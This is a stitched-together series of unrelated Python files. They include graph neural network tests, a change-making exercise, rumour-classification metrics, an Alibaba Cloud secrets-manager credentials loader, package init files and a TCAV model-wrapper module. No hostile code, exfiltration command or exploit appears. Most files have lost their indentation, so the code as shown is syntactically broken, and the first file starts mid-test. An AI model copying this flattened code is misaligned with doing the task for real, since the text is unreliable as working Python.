total_dim = 3
for i in range(7):
dim = random.randint(8, 10)
spec.append_sparse(20 + 10 * i, dim, False)
total_dim += dim
hops = [4, 5]
# the centric vertices share the same spec with 2-hop neighbors
schema = [("nodes", spec), ("nodes", spec), ("nodes", spec)]
# [f_num, batch_size] = [3, 2]
batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)])
batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2]
batch_ints = np.array([[i, 2 * i] for i in range(7)])
batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64)
vertices = Vertex(floats=batch_floats, ints=batch_ints)
# [f_num, batch_size] = [3, 2 * 4]
hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(3)])
hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2 * 4]
hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(7)])
hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64)
neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints)
# [f_num, batch_size] = [3, 2 * 4 * 5]
hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(3)])
hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2 * 4 * 5]
hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(7)])
hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64)
neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints)
g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops)
dims = np.array([total_dim, 16, 8])
model = HomoEgoGIN(
dims,
num_head=5,
bn_fn=None,
active_fn=tf.nn.relu,
droput=0.1)
embeddings = model.forward(g)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
ret = sess.run(embeddings)
self.assertListEqual([2, 8], list(ret.shape)) # [batch_size, output_dim]
def test_heterogeneous_graph(self):
u_spec = FeatureSpec(10)
for i in range(3):
u_spec.append_dense()
u_total_dim = 3
for i in range(7):
dim = random.randint(8, 10)
u_spec.append_sparse(20 + 10 * i, dim, False)
u_total_dim += dim
i_spec = FeatureSpec(19)
for i in range(6):
i_spec.append_dense()
i_total_dim = 6
for i in range(13):
dim = random.randint(8, 11)
i_spec.append_sparse(30 + 10 * i, dim, False)
i_total_dim += dim
u_out_dim = 16
i_out_dim = 12
out_dim = 9
hops = [4, 5]
# the centric vertices share the same spec with 2-hop neighbors
# metapath: u--i--i
schema = [("u_nodes", u_spec), ("nbr", i_spec), ("nbr", i_spec)]
# [f_num, batch_size] = [3, 2]
batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)])
batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2]
batch_ints = np.array([[i, 2 * i] for i in range(7)])
batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64)
vertices = Vertex(floats=batch_floats, ints=batch_ints)
# [f_num, batch_size] = [6, 2 * 4]
hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(6)])
hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32)
# [i_num, batch_size] = [13, 2 * 4]
hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(13)])
hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64)
neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints)
# [f_num, batch_size] = [6, 2 * 4 * 5]
hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(6)])
hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32)
# [i_num, batch_size] = [13, 2 * 4 * 5]
hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(13)])
hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64)
neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints)
g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops)
layer_ui = EgoGINLayer("heter_uv",
input_dim=(u_total_dim, i_total_dim),
output_dim=u_out_dim,
num_head=5)
layer_ii = EgoGINLayer("heter_ii",
input_dim=i_total_dim,
output_dim=i_out_dim,
num_head=5)
layer_uii = EgoGINLayer("heter_uii",
input_dim=(u_out_dim, i_out_dim),
output_dim=out_dim,
num_head=5)
layer_group_1 = EgoGINLayerGroup([layer_ui, layer_ii])
layer_group_2 = EgoGINLayerGroup([layer_uii])
model = EgoGIN(
[layer_group_1, layer_group_2],
bn_fn=None,
active_fn=tf.nn.relu,
droput=0.1)
embeddings = model.forward(g)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
ret = sess.run(embeddings)
self.assertListEqual([2, 9], list(ret.shape)) # [batch_size, output_dim]
if __name__ == "__main__":
unittest.main()
|
'''
(1) - Indicate how change should be given using the minimum number of notes. The
algorithm reads the value of the bill to be paid and the value of the payment,
ignoring the cents. Assume the notes available for change are 50, 20, 10, 5, 2
and 1 reais, and that none of them is missing from the register.
'''
valor_da_conta = float(input('Enter the bill amount: '))
valor_pago = float(input('Enter the amount paid: '))
troco = [50, 20, 10, 5, 2, 1]
restante = int(valor_pago - valor_da_conta)  # change owed, cents discarded
cont = 0
while restante > 0:
    n = restante // troco[cont]
    restante = restante % troco[cont]
    if n != 0:
        print('%d notes of R$ %.2f' % (n, troco[cont]))
    cont += 1
# Logic: print the change, note by note, until the full amount owed has been returned.
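# Worked example (made-up amounts): a bill of 62 paid with 100 leaves 38 in change,
# which the greedy loop breaks down as 1 note of 20, 1 of 10, 1 of 5, 1 of 2 and 1 of 1.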
|
# -*- coding: utf-8 -*-
"""
@object: weibo & twitter
@task: split train & test, evaluate performance
@author: majing
@variable: T,
@time: Tue Nov 10 16:29:42 2015
"""
import sys
import random
import os
import re
import math
import numpy as np
################## evaluation of model result #####################
def evaluation(prediction, y): ## no. of time series
TP = 0
TN = 0
FP = 0
FN = 0
e = 0.000001
threshhold = 0.5
    fout = open(outevalPath, 'w')  # outevalPath is expected to be defined at module scope by the caller
for i in range(len(y)):
fout.write(str(y[i][0])+"\t"+str(prediction[i][0])+"\n")
if y[i][0] == 1 and prediction[i][0] >= threshhold:
TP += 1
if y[i][0] == 1 and prediction[i][0] < threshhold:
FN += 1
if y[i][0] == 0 and prediction[i][0] >= threshhold:
FP += 1
if y[i][0] == 0 and prediction[i][0] < threshhold:
TN += 1
fout.close()
accu = float(TP+TN)/(TP+TN+FP+FN+e)
prec_r = float(TP)/(TP+FP+e) ## for rumor
recall_r = float(TP)/(TP+FN+e)
F_r = 2 * prec_r*recall_r / (prec_r + recall_r+e)
prec_f = float(TN)/(TN+FN+e) ## for fact
recall_f = float(TN)/(TN+FP+e)
F_f = 2 * prec_f*recall_f / (prec_f + recall_f+e)
return [accu, prec_r, recall_r, F_r, prec_f, recall_f, F_f]
def evaluation_2class(prediction, y): # 2 dim
TP1, FP1, FN1, TN1 = 0, 0, 0, 0
TP2, FP2, FN2, TN2 = 0, 0, 0, 0
e, RMSE, RMSE1, RMSE2 = 0.000001, 0.0, 0.0, 0.0
for i in range(len(y)):
y_i, p_i = list(y[i]), list(prediction[i][0])
##RMSE
for j in range(len(y_i)):
RMSE += (y_i[j]-p_i[j])**2
RMSE1 += (y_i[0]-p_i[0])**2
RMSE2 += (y_i[1]-p_i[1])**2
## Pre, Recall, F
Act = str(y_i.index(max(y_i))+1)
Pre = str(p_i.index(max(p_i))+1)
## for class 1
if Act == '1' and Pre == '1': TP1 += 1
if Act == '1' and Pre != '1': FN1 += 1
if Act != '1' and Pre == '1': FP1 += 1
if Act != '1' and Pre != '1': TN1 += 1
## for class 2
if Act == '2' and Pre == '2': TP2 += 1
if Act == '2' and Pre != '2': FN2 += 1
if Act != '2' and Pre == '2': FP2 += 1
if Act != '2' and Pre != '2': TN2 += 1
## print result
Acc_all = round( float(TP1+TP2)/float(len(y)+e), 4 )
Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 )
Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 )
F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 )
Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 )
Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 )
F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 )
RMSE_all = round( ( RMSE/len(y) )**0.5, 4)
RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4)
RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4)
RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2 )/2, 4)
return [Acc_all, RMSE_all, RMSE_all_avg, 'C1:', Prec1, Prec1, Recll1, F1,'\n',
'C2:', Prec2, Prec2, Recll2, F2,'\n']
def evaluation_4class(prediction, y): # 4 dim
TP1, FP1, FN1, TN1 = 0, 0, 0, 0
TP2, FP2, FN2, TN2 = 0, 0, 0, 0
TP3, FP3, FN3, TN3 = 0, 0, 0, 0
TP4, FP4, FN4, TN4 = 0, 0, 0, 0
e, RMSE, RMSE1, RMSE2, RMSE3, RMSE4 = 0.000001, 0.0, 0.0, 0.0, 0.0, 0.0
for i in range(len(y)):
y_i, p_i = list(y[i]), list(prediction[i])
##RMSE
for j in range(len(y_i)):
RMSE += (y_i[j]-p_i[j])**2
RMSE1 += (y_i[0]-p_i[0])**2
RMSE2 += (y_i[1]-p_i[1])**2
RMSE3 += (y_i[2]-p_i[2])**2
RMSE4 += (y_i[3]-p_i[3])**2
## Pre, Recall, F
Act = str(y_i.index(max(y_i))+1)
Pre = str(p_i.index(max(p_i))+1)
#print y_i, p_i
#print Act, Pre
## for class 1
if Act == '1' and Pre == '1': TP1 += 1
if Act == '1' and Pre != '1': FN1 += 1
if Act != '1' and Pre == '1': FP1 += 1
if Act != '1' and Pre != '1': TN1 += 1
## for class 2
if Act == '2' and Pre == '2': TP2 += 1
if Act == '2' and Pre != '2': FN2 += 1
if Act != '2' and Pre == '2': FP2 += 1
if Act != '2' and Pre != '2': TN2 += 1
## for class 3
if Act == '3' and Pre == '3': TP3 += 1
if Act == '3' and Pre != '3': FN3 += 1
if Act != '3' and Pre == '3': FP3 += 1
if Act != '3' and Pre != '3': TN3 += 1
## for class 4
if Act == '4' and Pre == '4': TP4 += 1
if Act == '4' and Pre != '4': FN4 += 1
if Act != '4' and Pre == '4': FP4 += 1
if Act != '4' and Pre != '4': TN4 += 1
## print result
Acc_all = round( float(TP1+TP2+TP3+TP4)/float(len(y)+e), 4 )
Acc1 = round( float(TP1+TN1)/float(TP1+TN1+FN1+FP1+e), 4 )
Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 )
Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 )
F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 )
Acc2 = round( float(TP2+TN2)/float(TP2+TN2+FN2+FP2+e), 4 )
Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 )
Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 )
F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 )
Acc3 = round( float(TP3+TN3)/float(TP3+TN3+FN3+FP3+e), 4 )
Prec3 = round( float(TP3)/float(TP3+FP3+e), 4 )
Recll3 = round( float(TP3)/float(TP3+FN3+e), 4 )
F3 = round( 2*Prec3*Recll3/(Prec3+Recll3+e), 4 )
Acc4 = round( float(TP4+TN4)/float(TP4+TN4+FN4+FP4+e), 4 )
Prec4 = round( float(TP4)/float(TP4+FP4+e), 4 )
Recll4 = round( float(TP4)/float(TP4+FN4+e), 4 )
F4 = round( 2*Prec4*Recll4/(Prec4+Recll4+e), 4 )
microF = round( (F1+F2+F3+F4)/4,5 )
RMSE_all = round( ( RMSE/len(y) )**0.5, 4)
RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4)
RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4)
RMSE_all_3 = round( ( RMSE3/len(y) )**0.5, 4)
RMSE_all_4 = round( ( RMSE4/len(y) )**0.5, 4)
RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2+RMSE_all_3+RMSE_all_4 )/4, 4)
return ['acc:', Acc_all, 'Favg:',microF, RMSE_all, RMSE_all_avg,
'C1:',Acc1, Prec1, Recll1, F1,
'C2:',Acc2, Prec2, Recll2, F2,
'C3:',Acc3, Prec3, Recll3, F3,
'C4:',Acc4, Prec4, Recll4, F4]
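# Quick illustrative check of evaluation_4class on toy one-hot labels (values are
# made up; both examples below are classified correctly, so accuracy is 1.0):
#
#   y_true = [[1, 0, 0, 0], [0, 0, 1, 0]]
#   y_pred = [[0.7, 0.1, 0.1, 0.1], [0.2, 0.1, 0.6, 0.1]]
#   print(evaluation_4class(y_pred, y_true))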
def write2Predict_oneVSall(prediction, y, resultPath): ## no. of time series
fout = open(resultPath, 'w')
for i in range(len(y)):
fout.write(str(prediction[i][0])+"\n")
fout.close()
def write2Predict_4class(prediction, y, resultPath): ## no. of time series
fout = open(resultPath, 'w')
for i in range(len(y)):
data1 = str(y[i][0])+' '+str(y[i][1])+' '+str(y[i][2])+' '+str(y[i][3])
data2 = str(prediction[i][0])+' '+str(prediction[i][1])+' '+str(prediction[i][2])+' '+str(prediction[i][3])
fout.write(data1+'\t'+data2+"\n")
fout.close()
#################################### MAIN ##############################################
|
from src.gui.Server import Server
server = Server()
|
import json
from alibaba_cloud_secretsmanager_client.model.client_key_credentials import ClientKeyCredential
from alibaba_cloud_secretsmanager_client.model.credentials_properties import CredentialsProperties
from alibaba_cloud_secretsmanager_client.model.region_info import RegionInfo
from aliyunsdkcore.auth import credentials
from alibaba_cloud_secretsmanager_client.utils import config_utils, const, env_const, client_key_utils
def check_config_param(param, param_name):
if param == "" or param is None:
raise ValueError("credentials config missing required parameters[%s]" % param_name)
def load_credentials_properties(file_name):
if file_name is None or file_name == "":
file_name = const.DEFAULT_CONFIG_NAME
config_dict = config_utils.Properties(file_name).get_properties()
credential = None
region_info_list = []
secret_name_list = []
if config_dict is not None and len(config_dict) > 0:
credentials_type = config_dict.get(env_const.ENV_CREDENTIALS_TYPE_KEY)
access_key_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
access_secret = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
check_config_param(credentials_type, env_const.ENV_CREDENTIALS_TYPE_KEY)
region_ids = config_dict.get(env_const.ENV_CACHE_CLIENT_REGION_ID_KEY)
check_config_param(region_ids, env_const.ENV_CACHE_CLIENT_REGION_ID_KEY)
try:
region_dict_list = json.loads(region_ids)
for region_dict in region_dict_list:
region_info_list.append(RegionInfo(
None if region_dict.get(
env_const.ENV_REGION_REGION_ID_NAME_KEY) == '' else region_dict.get(
env_const.ENV_REGION_REGION_ID_NAME_KEY),
region_dict.get(env_const.ENV_REGION_VPC_NAME_KEY),
None if region_dict.get(
env_const.ENV_REGION_ENDPOINT_NAME_KEY) == '' else region_dict.get(
env_const.ENV_REGION_ENDPOINT_NAME_KEY)))
except Exception:
raise ValueError(
("config param.get(%s) is illegal" % env_const.ENV_CACHE_CLIENT_REGION_ID_KEY))
if credentials_type == "ak":
check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
credential = credentials.AccessKeyCredential(access_key_id, access_secret)
elif credentials_type == "token":
access_token_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY)
access_token = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY)
check_config_param(access_token_id, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY)
check_config_param(access_token, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY)
credential = credentials.AccessKeyCredential(access_token_id, access_token)
elif credentials_type == "ram_role" or credentials_type == "sts":
role_session_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY)
role_arn = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_ARN_KEY)
check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
check_config_param(role_session_name, env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY)
check_config_param(role_arn, env_const.ENV_CREDENTIALS_ROLE_ARN_KEY)
credential = credentials.RamRoleArnCredential(access_key_id, access_secret,
role_arn, role_session_name)
elif credentials_type == "ecs_ram_role":
role_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_NAME_KEY)
check_config_param(role_name, env_const.ENV_CREDENTIALS_ROLE_NAME_KEY)
credential = credentials.EcsRamRoleCredential(role_name)
elif credentials_type == "client_key":
client_key_path = config_dict.get(env_const.EnvClientKeyPrivateKeyPathNameKey)
check_config_param(client_key_path, env_const.EnvClientKeyPrivateKeyPathNameKey)
password = client_key_utils.get_password(config_dict)
cred, signer = client_key_utils.load_rsa_key_pair_credential_and_client_key_signer(
client_key_path, password)
credential = ClientKeyCredential(signer, cred)
else:
raise ValueError(("config param.get(%s) is illegal" % env_const.ENV_CREDENTIALS_TYPE_KEY))
secret_names = config_dict.get(const.PROPERTIES_SECRET_NAMES_KEY)
if secret_names != "" and secret_names is not None:
secret_name_list.extend(secret_names.split(","))
credential_properties = CredentialsProperties(credential, secret_name_list, region_info_list, config_dict)
return credential_properties
return None
|
# flake8: noqa
"""
__init__.py for import child .py files
isort:skip_file
"""
# Utility classes & functions
import pororo.tasks.utils
from pororo.tasks.utils.download_utils import download_or_load
from pororo.tasks.utils.base import (
PororoBiencoderBase,
PororoFactoryBase,
PororoGenerationBase,
PororoSimpleBase,
PororoTaskGenerationBase,
)
# Factory classes
from pororo.tasks.age_suitability import PororoAgeSuitabilityFactory
from pororo.tasks.automated_essay_scoring import PororoAesFactory
from pororo.tasks.automatic_speech_recognition import PororoAsrFactory
from pororo.tasks.collocation import PororoCollocationFactory
from pororo.tasks.constituency_parsing import PororoConstFactory
from pororo.tasks.dependency_parsing import PororoDpFactory
from pororo.tasks.fill_in_the_blank import PororoBlankFactory
from pororo.tasks.grammatical_error_correction import PororoGecFactory
from pororo.tasks.grapheme_conversion import PororoP2gFactory
from pororo.tasks.image_captioning import PororoCaptionFactory
from pororo.tasks.morph_inflection import PororoInflectionFactory
from pororo.tasks.lemmatization import PororoLemmatizationFactory
from pororo.tasks.named_entity_recognition import PororoNerFactory
from pororo.tasks.natural_language_inference import PororoNliFactory
from pororo.tasks.optical_character_recognition import PororoOcrFactory
from pororo.tasks.paraphrase_generation import PororoParaphraseFactory
from pororo.tasks.paraphrase_identification import PororoParaIdFactory
from pororo.tasks.phoneme_conversion import PororoG2pFactory
from pororo.tasks.pos_tagging import PororoPosFactory
from pororo.tasks.question_generation import PororoQuestionGenerationFactory
from pororo.tasks.machine_reading_comprehension import PororoMrcFactory
from pororo.tasks.semantic_role_labeling import PororoSrlFactory
from pororo.tasks.semantic_textual_similarity import PororoStsFactory
from pororo.tasks.sentence_embedding import PororoSentenceFactory
from pororo.tasks.sentiment_analysis import PororoSentimentFactory
from pororo.tasks.contextualized_embedding import PororoContextualFactory
from pororo.tasks.text_summarization import PororoSummarizationFactory
from pororo.tasks.tokenization import PororoTokenizationFactory
from pororo.tasks.machine_translation import PororoTranslationFactory
from pororo.tasks.word_embedding import PororoWordFactory
from pororo.tasks.word_translation import PororoWordTranslationFactory
from pororo.tasks.zero_shot_classification import PororoZeroShotFactory
from pororo.tasks.review_scoring import PororoReviewFactory
from pororo.tasks.speech_translation import PororoSpeechTranslationFactory
|
from . import algorithms, buffers, noise, transition
__all__ = ["algorithms", "buffers", "noise", "transition"]
|
"""Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
from six.moves import zip
import numpy as np
import six
import tensorflow as tf
from google.protobuf import text_format
class ModelWrapper(six.with_metaclass(ABCMeta, object)):
"""Simple wrapper of the for models with session object for TCAV.
Supports easy inference with no need to deal with the feed_dicts.
"""
@abstractmethod
def __init__(self, model_path=None, node_dict=None):
"""Initialize the wrapper.
Optionally create a session, load
the model from model_path to this session, and map the
input/output and bottleneck tensors.
Args:
model_path: one of the following: 1) Directory path to checkpoint 2)
Directory path to SavedModel 3) File path to frozen graph.pb 4) File
path to frozen graph.pbtxt
node_dict: mapping from a short name to full input/output and bottleneck
tensor names. Users should pass 'input' and 'prediction'
as keys and the corresponding input and prediction tensor
names as values in node_dict. Users can additionally pass bottleneck
tensor names for which gradient Ops will be added later.
"""
# A dictionary of bottleneck tensors.
self.bottlenecks_tensors = None
# A dictionary of input, 'logit' and prediction tensors.
self.ends = None
# The model name string.
self.model_name = None
# a place holder for index of the neuron/class of interest.
# usually defined under the graph. For example:
# with g.as_default():
# self.tf.placeholder(tf.int64, shape=[None])
self.y_input = None
# The tensor representing the loss (used to calculate derivative).
self.loss = None
# If tensors in the loaded graph are prefixed with 'import/'
self.import_prefix = False
if model_path:
self._try_loading_model(model_path)
if node_dict:
self._find_ends_and_bottleneck_tensors(node_dict)
def _try_loading_model(self, model_path):
""" Load model from model_path.
TF models are often saved in one of the three major formats:
1) Checkpoints with ckpt.meta, ckpt.data, and ckpt.index.
2) SavedModel format with saved_model.pb and variables/.
3) Frozen graph in .pb or .pbtxt format.
When model_path is specified, model is loaded in one of the
three formats depending on the model_path. When model_path is
    omitted, the child wrapper is responsible for loading the model.
"""
try:
self.sess = tf.Session(graph=tf.Graph())
with self.sess.graph.as_default():
if tf.io.gfile.isdir(model_path):
ckpt = tf.train.latest_checkpoint(model_path)
if ckpt:
tf.compat.v1.logging.info('Loading from the latest checkpoint.')
saver = tf.train.import_meta_graph(ckpt + '.meta')
saver.restore(self.sess, ckpt)
else:
tf.compat.v1.logging.info('Loading from SavedModel dir.')
tf.saved_model.loader.load(self.sess, ['serve'], model_path)
else:
input_graph_def = tf.compat.v1.GraphDef()
if model_path.endswith('.pb'):
tf.compat.v1.logging.info('Loading from frozen binary graph.')
with tf.io.gfile.GFile(model_path, 'rb') as f:
input_graph_def.ParseFromString(f.read())
else:
tf.compat.v1.logging.info('Loading from frozen text graph.')
with tf.io.gfile.GFile(model_path) as f:
text_format.Parse(f.read(), input_graph_def)
tf.import_graph_def(input_graph_def)
self.import_prefix = True
except Exception as e:
template = 'An exception of type {0} occurred ' \
'when trying to load model from {1}. ' \
'Arguments:\n{2!r}'
tf.compat.v1.logging.warn(template.format(type(e).__name__, model_path, e.args))
def _find_ends_and_bottleneck_tensors(self, node_dict):
""" Find tensors from the graph by their names.
Depending on how the model is loaded, tensors in the graph
may or may not have 'import/' prefix added to every tensor name.
This is true even if the tensors already have 'import/' prefix.
The 'ends' and 'bottlenecks_tensors' dictionary should map to tensors
with the according name.
"""
self.bottlenecks_tensors = {}
self.ends = {}
for k, v in six.iteritems(node_dict):
if self.import_prefix:
v = 'import/' + v
      tensor = self.sess.graph.get_operation_by_name(v.split(':')[0]).outputs[0]
if k == 'input' or k == 'prediction':
self.ends[k] = tensor
else:
self.bottlenecks_tensors[k] = tensor
def _make_gradient_tensors(self):
"""Makes gradient tensors for all bottleneck tensors."""
self.bottlenecks_gradients = {}
for bn in self.bottlenecks_tensors:
self.bottlenecks_gradients[bn] = tf.gradients(
self.loss, self.bottlenecks_tensors[bn])[0]
def get_gradient(self, acts, y, bottleneck_name, example):
"""Return the gradient of the loss with respect to the bottleneck_name.
Args:
acts: activation of the bottleneck
y: index of the logit layer
bottleneck_name: name of the bottleneck to get gradient wrt.
example: input example. Unused by default. Necessary for getting gradients
from certain models, such as BERT.
Returns:
the gradient array.
"""
return self.sess.run(self.bottlenecks_gradients[bottleneck_name], {
self.bottlenecks_tensors[bottleneck_name]: acts,
self.y_input: y
})
def get_predictions(self, examples):
"""Get prediction of the examples.
Args:
      examples: array of examples to get predictions for
Returns:
array of predictions
"""
return self.adjust_prediction(
self.sess.run(self.ends['prediction'], {self.ends['input']: examples}))
def adjust_prediction(self, pred_t):
"""Adjust the prediction tensor to be the expected shape.
Defaults to a no-op, but necessary to override for GoogleNet
Returns:
pred_t: pred_tensor.
"""
return pred_t
def reshape_activations(self, layer_acts):
"""Reshapes layer activations as needed to feed through the model network.
Override this for models that require reshaping of the activations for use
in TCAV.
Args:
layer_acts: Activations as returned by run_examples.
Returns:
      Activations in model-dependent form; the default is a squeezed array (i.e.
      with all dimensions of size 1 removed).
"""
return np.asarray(layer_acts).squeeze()
def label_to_id(self, label):
"""Convert label (string) to index in the logit layer (id).
Override this method if label to id mapping is known. Otherwise,
default id 0 is used.
"""
tf.compat.v1.logging.warn('label_to_id undefined. Defaults to returning 0.')
return 0
def id_to_label(self, idx):
"""Convert index in the logit layer (id) to label (string).
Override this method if id to label mapping is known.
"""
return str(idx)
def run_examples(self, examples, bottleneck_name):
"""Get activations at a bottleneck for provided examples.
Args:
examples: example data to feed into network.
bottleneck_name: string, should be key of self.bottlenecks_tensors
Returns:
Activations in the given layer.
"""
return self.sess.run(self.bottlenecks_tensors[bottleneck_name],
{self.ends['input']: examples})
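# Illustrative subclass wiring a frozen graph into the wrapper (the path and the
# tensor names in node_dict below are hypothetical; 'input' and 'prediction' are
# the required keys, any other key is treated as a bottleneck):
#
#   class MyFrozenGraphWrapper(ModelWrapper):
#
#     def __init__(self):
#       super(MyFrozenGraphWrapper, self).__init__(
#           model_path='/path/to/frozen_graph.pb',
#           node_dict={'input': 'input:0',
#                      'prediction': 'softmax:0',
#                      'mixed_8': 'mixed_8/join:0'})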
class ImageModelWrapper(ModelWrapper):
"""Wrapper base class for image models."""
def __init__(self, image_shape):
super(ModelWrapper, self).__init__()
# shape of the input image in this model
self.image_shape = image_shape
def get_image_shape(self):
"""returns the shape of an input image."""
return self.image_shape
class PublicImageModelWrapper(ImageModelWrapper):
"""Simple wrapper of the public image models with session object."""
def __init__(self, sess, model_fn_path, labels_path, image_shape,
endpoints_dict, scope):
super(PublicImageModelWrapper, self).__init__(image_shape)
self.labels = tf.io.gfile.GFile(labels_path).read().splitlines()
self.ends = PublicImageModelWrapper.import_graph(
model_fn_path, endpoints_dict, self.image_value_range, scope=scope)
self.bottlenecks_tensors = PublicImageModelWrapper.get_bottleneck_tensors(
scope)
graph = tf.compat.v1.get_default_graph()
# Construct gradient ops.
with graph.as_default():
self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None])
self.pred = tf.expand_dims(self.ends['prediction'][0], 0)
self.loss = tf.reduce_mean(
tf.compat.v1.nn.softmax_cross_entropy_with_logits_v2(
labels=tf.one_hot(
self.y_input,
self.ends['prediction'].get_shape().as_list()[1]),
logits=self.pred))
self._make_gradient_tensors()
def id_to_label(self, idx):
return self.labels[idx]
def label_to_id(self, label):
return self.labels.index(label)
@staticmethod
def create_input(t_input, image_value_range):
"""Create input tensor."""
def forget_xy(t):
"""Forget sizes of dimensions [1, 2] of a 4d tensor."""
zero = tf.identity(0)
return t[:, zero:, zero:, :]
t_prep_input = t_input
if len(t_prep_input.shape) == 3:
t_prep_input = tf.expand_dims(t_prep_input, 0)
t_prep_input = forget_xy(t_prep_input)
lo, hi = image_value_range
t_prep_input = lo + t_prep_input * (hi - lo)
return t_input, t_prep_input
# From Alex's code.
@staticmethod
def get_bottleneck_tensors(scope):
"""Add Inception bottlenecks and their pre-Relu versions to endpoints dict."""
graph = tf.compat.v1.get_default_graph()
bn_endpoints = {}
for op in graph.get_operations():
if op.name.startswith(scope + '/') and 'Concat' in op.type:
name = op.name.split('/')[1]
bn_endpoints[name] = op.outputs[0]
return bn_endpoints
# Load graph and import into graph used by our session
@staticmethod
def import_graph(saved_path, endpoints, image_value_range, scope='import'):
t_input = tf.compat.v1.placeholder(np.float32, [None, None, None, 3])
graph = tf.Graph()
assert graph.unique_name(scope, False) == scope, (
'Scope "%s" already exists. Provide explicit scope names when '
'importing multiple instances of the model.') % scope
graph_def = tf.compat.v1.GraphDef.FromString(
tf.io.gfile.GFile(saved_path, 'rb').read())
with tf.name_scope(scope) as sc:
t_input, t_prep_input = PublicImageModelWrapper.create_input(
t_input, image_value_range)
graph_inputs = {}
graph_inputs[endpoints['input']] = t_prep_input
myendpoints = tf.import_graph_def(
graph_def, graph_inputs, list(endpoints.values()), name=sc)
myendpoints = dict(list(zip(list(endpoints.keys()), myendpoints)))
myendpoints['input'] = t_input
return myendpoints
class GoogleNetWrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
image_shape_v1 = [224, 224, 3]
self.image_value_range = (-117, 255 - 117)
endpoints_v1 = dict(
input='input:0',
logit='softmax2_pre_activation:0',
prediction='output2:0',
pre_avgpool='mixed5b:0',
logit_weight='softmax2_w:0',
logit_bias='softmax2_b:0',
)
self.sess = sess
super(GoogleNetWrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v1,
endpoints_v1,
scope='v1')
self.model_name = 'GoogleNet_public'
def adjust_prediction(self, pred_t):
    # Each example's prediction comes back as a 16 x 1008 matrix; keep only the
    # first row of each 16-row block, following the TF model zoo convention.
return pred_t[::16]
